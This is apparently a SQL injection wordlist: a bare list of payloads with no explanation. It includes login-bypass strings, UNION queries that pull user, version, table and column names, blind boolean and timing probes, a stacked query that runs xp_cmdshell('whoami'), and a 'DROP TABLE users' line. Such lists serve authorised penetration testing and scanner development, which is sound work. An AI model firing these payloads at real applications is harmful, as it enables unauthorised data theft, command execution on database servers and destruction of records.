'
' OR 1=1--
" OR 1=1--
' UNION SELECT NULL--
' OR '1'='1
' OR 1=1--
' OR 1=1#
' OR '1'='1' --
admin' --
' OR 'x'='x
' UNION SELECT null,null,null--
' UNION SELECT user(),database(),version()--
' AND 1=0 UNION SELECT table_name, null, null FROM information_schema.tables--
'; EXEC xp_cmdshell('whoami')--
1; DROP TABLE users --
' OR '1'='1' /* 
" OR 1=1 /* 
admin')-- 
0 UNION SELECT null, table_name FROM information_schema.tables--
0 UNION SELECT null, column_name FROM information_schema.columns WHERE table_name='users'--
1 AND ASCII(SUBSTRING((SELECT user()),1,1)) > 64--
'||benchmark(1000000,MD5(1))||'
/*'+UNION+SELECT+1,2,3--+
admin' OR '1'='1' AND ''='
' OR (SELECT COUNT(*) FROM users) > 0--
